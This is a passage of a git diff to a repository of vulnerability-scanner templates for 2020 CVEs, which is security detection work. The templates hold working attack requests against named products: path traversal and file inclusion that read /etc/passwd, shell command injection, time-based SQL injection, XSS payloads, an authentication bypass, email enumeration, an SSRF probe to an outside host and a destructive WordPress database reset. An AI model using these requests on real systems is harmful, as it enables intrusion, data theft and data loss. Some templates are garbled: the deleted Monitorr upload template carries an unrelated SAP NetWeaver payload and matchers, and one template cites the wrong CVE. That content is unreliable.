"12.2.1.4" - condition: or - part: body - - - type: word - words: - - "WebLogic" - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/25 diff --git a/nuclei-templates/CVE-2020/CVE-2020-25864.yaml b/nuclei-templates/CVE-2020/CVE-2020-25864.yaml new file mode 100644 index 0000000000..03edd0be81 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-25864.yaml @@ -0,0 +1,58 @@ +id: CVE-2020-25864 + +info: + name: HashiCorp Consul/Consul Enterprise <=1.9.4 - Cross-Site Scripting + author: c-sh0 + severity: medium + description: | + HashiCorp Consul and Consul Enterprise up to version 1.9.4 are vulnerable to cross-site scripting via the key-value (KV) raw mode. + remediation: Fixed in 1.9.5, 1.8.10 and 1.7.14. + reference: + - https://discuss.hashicorp.com/t/hcsec-2021-07-consul-api-kv-endpoint-vulnerable-to-cross-site-scripting/23368 + - https://www.hashicorp.com/blog/category/consul + - https://nvd.nist.gov/vuln/detail/CVE-2020-25864 + - https://security.gentoo.org/glsa/202208-09 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-25864 + cwe-id: CWE-79 + epss-score: 0.00233 + epss-percentile: 0.61248 + cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:* + metadata: + max-request: 2 + vendor: hashicorp + product: consul + tags: cve,cve2020,consul,xss,intrusive + +http: + - raw: + - | + PUT {{BaseURL}}/v1/kv/{{randstr}} HTTP/1.1 + Host: {{Hostname}} + + + - | + GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + + matchers-condition: and + matchers: + - type: word + part: header + words: + - text/html + + - type: word + part: body_2 + words: + - + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100d0ab52623fca6424b41ec86c355d721a6ce09d1429070278c87b76ec33dba84f0221008f23122ed47b68e036bc6722e13ce1528c1fd4a27b9f636ef9963252bc4f6102:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2020/CVE-2020-26073.yaml b/nuclei-templates/CVE-2020/CVE-2020-26073.yaml new file mode 100644 index 0000000000..eaea12f311 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-26073.yaml @@ -0,0 +1,27 @@ +id: CVE-2020-26073 + +info: + name: Cisco SD-WAN vManage Software Directory Traversal + author: madrobot + severity: high + description: | + A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to gain access to sensitive information. + reference: + - https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html + classification: + cve-id: CVE-2020-26073 + tags: cve,cve2020,cisco,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/nuclei-templates/CVE-2020/cve-2020-26214.yaml b/nuclei-templates/CVE-2020/CVE-2020-26214.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-26214.yaml rename to nuclei-templates/CVE-2020/CVE-2020-26214.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-26413.yaml b/nuclei-templates/CVE-2020/CVE-2020-26413.yaml new file mode 100644 index 0000000000..c7b27a83a0 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-26413.yaml @@ -0,0 +1,57 @@ +id: CVE-2020-26413 + +info: + name: Gitlab CE/EE 13.4 - 13.6.2 - Information Disclosure + author: _0xf4n9x_,pikpikcu + severity: medium + description: GitLab CE and EE 13.4 through 13.6.2 is susceptible to Information disclosure via GraphQL. User email is visible. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + reference: + - https://gitlab.com/gitlab-org/gitlab/-/issues/244275 + - https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json + - https://nvd.nist.gov/vuln/detail/CVE-2020-26413 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2020-26413 + cwe-id: CWE-200 + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:* + epss-score: 0.70208 + metadata: + max-request: 1 + shodan-query: http.title:"GitLab" + tags: cve,cve2020,gitlab,exposure,enum,graphql + +http: + - raw: + - | + POST /api/graphql HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "query": "{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }", + "variables": null, + "operationName": null + } + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"username":' + - '"avatarUrl":' + - '"node":' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: json + part: body + json: + - '.data.users.edges[].node.email' + +# Enhanced by md on 2023/02/01 diff --git a/nuclei-templates/CVE-2020/CVE-2020-26948.yaml b/nuclei-templates/CVE-2020/CVE-2020-26948.yaml deleted file mode 100644 index 92f064b05e..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-26948.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2020-26948 - -info: - name: Emby Server Server-Side Request Forgery - author: dwisiswant0 - severity: critical - description: Emby Server before 4.5.0 allows server-side request forgery (SSRF) via the Items/RemoteSearch/Image ImageURL parameter. - reference: - - https://github.com/btnz-k/emby_ssrf - - https://nvd.nist.gov/vuln/detail/CVE-2020-26948 - - https://github.com/btnz-k/emby_ssrf/blob/master/emby_scan.rb - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-26948 - cwe-id: CWE-918 - cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:* - epss-score: 0.0284 - tags: cve,cve2020,emby,jellyfin,ssrf - metadata: - max-request: 1 - -http: - - method: GET - path: - - "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net" - matchers-condition: and - matchers: - - type: status - status: - - 500 - - type: word - words: - - "Name or service not known" - part: body - - type: word - words: - - "text/plain" - part: header - -# Enhanced by mp on 2022/03/27 diff --git a/nuclei-templates/CVE-2020/CVE-2020-27191.yaml b/nuclei-templates/CVE-2020/CVE-2020-27191.yaml new file mode 100644 index 0000000000..27d923704b --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-27191.yaml @@ -0,0 +1,45 @@ +id: CVE-2020-27191 + +info: + name: LionWiki <3.2.12 - Local File Inclusion + author: 0x_Akoko + severity: high + description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data. + remediation: | + Upgrade LionWiki to version 3.2.12 or later to mitigate the LFI vulnerability. + reference: + - https://www.junebug.site/blog/cve-2020-27191-lionwiki-3-2-11-lfi + - http://lionwiki.0o.cz/index.php?page=Main+page + - https://nvd.nist.gov/vuln/detail/CVE-2020-27191 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-27191 + cwe-id: CWE-22 + epss-score: 0.01572 + epss-percentile: 0.86986 + cpe: cpe:2.3:a:lionwiki:lionwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: lionwiki + product: lionwiki + tags: cve2020,cve,lionwiki,lfi,oss + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + + - type: status + status: + - 200 +# digest: 480a00453043022024fd9eabd5990697a1c0d513e268964dba7e4032104e676f2c1516f0d7bf1e6c021f01979b841bd595af2324f5a4beea443729213ab4e816a2f27b4f681dfe71ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-27467.yaml b/nuclei-templates/CVE-2020/CVE-2020-27467.yaml new file mode 100644 index 0000000000..e6cea59742 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-27467.yaml @@ -0,0 +1,46 @@ +id: CVE-2020-27467 + +info: + name: Processwire CMS <2.7.1 - Local File Inclusion + author: 0x_Akoko + severity: high + description: Processwire CMS prior to 2.7.1 is vulnerable to local file inclusion because it allows a remote attacker to retrieve sensitive files via the download parameter to index.php. + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or gain unauthorized access to the system. + remediation: | + Upgrade Processwire CMS to version 2.7.1 or later to fix the Local File Inclusion vulnerability. + reference: + - https://github.com/Y1LD1R1M-1337/LFI-ProcessWire + - https://processwire.com/ + - https://github.com/ceng-yildirim/LFI-processwire + - https://nvd.nist.gov/vuln/detail/CVE-2020-27467 + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-27467 + cwe-id: CWE-22 + epss-score: 0.01056 + epss-percentile: 0.83739 + cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: processwire + product: processwire + tags: cve,cve2020,processwire,lfi,cms,oss + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?download=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 +# digest: 490a00463044022005cc8cc6d259f90bddcc4ab74577e25407c52171a5893d763b5d5ab1dd6159c602204a99b859d07b48c2f47cf2a1a8329315e236c3999217ea353e49076587c74df0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-27481.yaml b/nuclei-templates/CVE-2020/CVE-2020-27481.yaml new file mode 100644 index 0000000000..83c85522de --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-27481.yaml @@ -0,0 +1,49 @@ +id: CVE-2020-27481 + +info: + name: Good Layers LMS Plugin <= 2.1.4 - SQL Injection + author: edoardottt + severity: critical + description: | + An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin <= 2.1.4 exists due to the usage of "wp_ajax_nopriv" call in WordPress, which allows any unauthenticated user to get access to the function "gdlr_lms_cancel_booking" where POST Parameter "id" was sent straight into SQL query without sanitization. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Upgrade to the latest version of the Good Layers LMS Plugin (2.1.5 or higher) to mitigate this vulnerability. + reference: + - https://wpscan.com/vulnerability/652eaef8-5a3c-4a2d-ac60-b5414565c397 + - https://gist.github.com/0xx7/a7aaa8b0515139cf7e30c808c8d54070 + - https://nvd.nist.gov/vuln/detail/CVE-2020-27481 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-27481 + cwe-id: CWE-89 + epss-score: 0.12857 + epss-percentile: 0.94961 + cpe: cpe:2.3:a:goodlayers:good_learning_management_system:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: goodlayers + product: good_learning_management_system + framework: wordpress + tags: cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress + +http: + - raw: + - | + @timeout: 15s + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=gdlr_lms_cancel_booking&id=(SELECT%201337%20FROM%20(SELECT(SLEEP(6)))MrMV) + + matchers: + - type: dsl + dsl: + - "duration>=6" + - "status_code == 200" + - "contains(body, 'goodlayers-lms') || contains(body, 'goodlms')" + condition: and +# digest: 4a0a00473045022100838e205274d6592ebebcc4ab9b689fd6d05ec245b61cb0f69cff831152ea32dd02203fc10829d7d36c26e62df66914a28f76aea1fb34c5f7162abe66805dbf74f212:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-27866.yaml b/nuclei-templates/CVE-2020/CVE-2020-27866.yaml new file mode 100644 index 0000000000..264468488a --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-27866.yaml @@ -0,0 +1,45 @@ +id: CVE-2020-27866 + +info: + name: NETGEAR - Authentication Bypass + author: gy741 + severity: high + description: NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers are vulnerable to authentication bypass vulnerabilities which could allow network-adjacent attackers to bypass authentication on affected installations. + reference: + - https://wzt.ac.cn/2021/01/13/AC2400_vuln/ + - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866 + - https://kb.netgear.com/000062641/Security-Advisory-for-Password-Recovery-Vulnerabilities-on-Some-Routers + - https://nvd.nist.gov/vuln/detail/CVE-2020-27866 + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-27866 + cwe-id: CWE-288 + epss-score: 0.00365 + tags: cve,cve2020,netgear,auth-bypass + metadata: + max-request: 1 + +http: + - raw: + - | + GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en + Connection: close + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'Debug Enable!' + part: body + +# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2020/CVE-2020-27982.yaml b/nuclei-templates/CVE-2020/CVE-2020-27982.yaml new file mode 100644 index 0000000000..2b7a6b2741 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-27982.yaml @@ -0,0 +1,38 @@ +id: CVE-2020-27982 + +info: + name: IceWarp WebMail Reflected XSS + author: madrobot + severity: medium + description: IceWarp 11.4.5.0 allows XSS via the language parameter. + reference: + - https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html + - http://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html + - https://cxsecurity.com/issue/WLB-2020100161 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-27982 + cwe-id: CWE-79 + tags: cve,cve2020,xss,icewarp + +requests: + - method: GET + path: + - "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + part: body + + - type: word + words: + - "text/html" + part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-27986.yaml b/nuclei-templates/CVE-2020/CVE-2020-27986.yaml deleted file mode 100644 index a1298076ab..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-27986.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2020-27986 - -info: - name: SonarQube - Authentication Bypass - author: pikpikcu - severity: high - description: | - SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, - SVN, and GitLab credentials via the api/settings/values URI. - reference: - - https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-27866 - remediation: Reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-27986 - cwe-id: CWE-306,CWE-312 - cpe: cpe:2.3:a:sonarsource:sonarqube:*:*:*:*:*:*:*:* - epss-score: 0.23185 - tags: cve,cve2020,sonarqube - metadata: - max-request: 1 - -http: - - method: GET - path: - - "{{BaseURL}}/api/settings/values" - - matchers-condition: and - matchers: - - type: word - words: - - email.smtp_host.secured - - email.smtp_password.secured - - email.smtp_port.secured - - email.smtp_username.secured - part: body - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2020/CVE-2020-28871.yaml b/nuclei-templates/CVE-2020/CVE-2020-28871.yaml deleted file mode 100644 index 1d83410ac0..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-28871.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2020-28871 - -info: - name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution - author: gy741 - severity: critical - description: Monitorr 1.7.6m is susceptible to a remote code execution vulnerability. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr. - reference: - - https://www.exploit-db.com/exploits/48980 - - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-28871 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-28871 - cwe-id: CWE-434 - tags: cve,cve2020,monitorr,rce,oast,unauth - -requests: - - raw: - - | - POST /assets/php/upload.php HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: text/plain, */*; q=0.01 - Connection: close - Accept-Language: en-US,en;q=0.5 - X-Requested-With: XMLHttpRequest - Content-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745 - Origin: http://{{Hostname}} - Referer: http://{{Hostname}} - - -----------------------------31046105003900160576454225745 - Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php" - Content-Type: image/gif - - GIF89a213213123sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc - CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA== - userDetails - - # userName - sapRpoc6351 - # password - Secure!PwD8890 - - matchers-condition: and - matchers: - - type: word - words: - - "CTCWebServiceSi" - - "SOAP-ENV" - part: body - condition: and - - - type: status - status: - - 200 - - - type: word - words: - - "text/xml" - - "SAP NetWeaver Application Server" - part: header - -# Enhanced by mp on 2022/04/29 diff --git a/nuclei-templates/CVE-2020/cve-2020-6637.yaml b/nuclei-templates/CVE-2020/CVE-2020-6637.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-6637.yaml rename to nuclei-templates/CVE-2020/CVE-2020-6637.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-7048.yaml b/nuclei-templates/CVE-2020/CVE-2020-7048.yaml index 43f63850ad..6ec39fc1d2 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-7048.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-7048.yaml @@ -1,58 +1,21 @@ id: CVE-2020-7048 info: - name: > - WP Database Reset <= 3.1 - Unauthenticated Database Reset - author: topscoder - severity: critical - description: > - The WordPress plugin, WP Database Reset through 3.1, contains a flaw that allowed any unauthenticated user to reset any table in the database to the initial WordPress set-up state (deleting all site content stored in that table), as demonstrated by a wp-admin/admin-post.php?db-reset-tables[]=comments URI. - reference: - - https://www.wordfence.com/threat-intel/vulnerabilities/id/9a29aea7-9e22-4edb-80d9-266843a416a5?source=api-prod - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H - cvss-score: 9.1 - cve-id: CVE-2020-7048 - metadata: - fofa-query: "wp-content/plugins/wordpress-database-reset/" - google-query: inurl:"/wp-content/plugins/wordpress-database-reset/" - shodan-query: 'vuln:CVE-2020-7048' - tags: cve,wordpress,wp-plugin,wordpress-database-reset,critical - -http: + name: Wordpress Database Reset + author: medbsq + severity: high +# https://www.cvebase.com/cve/2020/3952 +requests: - method: GET - redirects: true - max-redirects: 3 path: - - "{{BaseURL}}/wp-content/plugins/wordpress-database-reset/readme.txt" - - extractors: - - type: regex - name: version - part: body - group: 1 - internal: true - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - - type: regex - name: version - part: body - group: 1 - regex: - - "(?mi)Stable tag: ([0-9.]+)" - - matchers-condition: and + - "{{BaseURL}}/wp-admin/admin-post.php?db-reset-tables%5B%5D=comments&db-reset-code=11111&db-reset-code-confirm=11111" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + + + matchers-condition: or matchers: - - type: status - status: - - 200 - - type: word words: - - "wordpress-database-reset" - part: body - - - type: dsl - dsl: - - compare_versions(version, '<= 3.1') \ No newline at end of file + - "X-Redirect-By: WordPress" + part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-7136.yaml b/nuclei-templates/CVE-2020/CVE-2020-7136.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-7136.yaml rename to nuclei-templates/CVE-2020/CVE-2020-7136.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-7209.yaml b/nuclei-templates/CVE-2020/CVE-2020-7209.yaml new file mode 100644 index 0000000000..71e5eca072 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-7209.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-7209 + +info: + name: LinuxKI Toolset <= 6.01 - Remote Command Execution + author: dwisiswant0 + severity: critical + description: LinuxKI v6.0-1 and earlier are vulnerable to remote code execution. + remediation: This is resolved in release 6.0-2. + reference: + - http://packetstormsecurity.com/files/157739/HP-LinuxKI-6.01-Remote-Command-Injection.html + - http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html + - https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-2 + - https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 + - https://www.hpe.com/us/en/home.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-7209 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-7209 + tags: cve,cve2020,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + + +# Enhanced by mp on 2022/04/29 diff --git a/nuclei-templates/CVE-2020/cve-2020-7247.yaml b/nuclei-templates/CVE-2020/CVE-2020-7247.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-7247.yaml rename to nuclei-templates/CVE-2020/CVE-2020-7247.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-7318.yaml b/nuclei-templates/CVE-2020/CVE-2020-7318.yaml new file mode 100644 index 0000000000..00cbcb1359 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-7318.yaml @@ -0,0 +1,45 @@ +id: CVE-2020-7318 + +info: + name: McAfee ePolicy Orchestrator Reflected XSS + author: dwisiswant0 + severity: medium + description: | + Cross-Site Scripting vulnerability in McAfee ePolicy Orchestrator (ePO) + prior to 5.10.9 Update 9 allows administrators to inject arbitrary web + script or HTML via multiple parameters where the administrator's entries + were not correctly sanitized. + + reference: + - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ + reference: + - https://kc.mcafee.com/corporate/index?page=content&id=SB10332 + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2020-7318 + cwe-id: CWE-79 + tags: cve,cve2020,xss,mcafee + +requests: + - raw: + - | + GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1 + Host: {{Hostname}} + Connection: close + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "text/html" + part: header + - type: word + words: + - "Policy Name" + - "'\">" + condition: and + part: body diff --git a/nuclei-templates/CVE-2020/CVE-2020-8191.yaml b/nuclei-templates/CVE-2020/CVE-2020-8191.yaml deleted file mode 100644 index 137397c3ee..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-8191.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2020-8191 - -info: - name: Citrix ADC/Gateway - Cross-Site Scripting - author: dwisiswant0 - severity: medium - description: | - Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation. - reference: - - https://support.citrix.com/article/CTX276688 - - https://nvd.nist.gov/vuln/detail/CVE-2020-8191 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-8191 - cwe-id: CWE-79 - epss-score: 0.00223 - tags: cve,cve2020,citrix,xss - metadata: - max-request: 1 - -http: - - raw: - - | - POST /menu/stapp HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - X-NITRO-USER: xpyZxwy6 - - sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: status - status: - - 200 - - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/09/02 diff --git a/nuclei-templates/CVE-2020/CVE-2020-8194.yaml b/nuclei-templates/CVE-2020/CVE-2020-8194.yaml deleted file mode 100644 index b42f15be5a..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-8194.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2020-8194 - -info: - name: Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection - author: dwisiswant0 - severity: medium - - description: Citrix ADC and NetScaler Gateway are susceptible to remote code injection. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are before 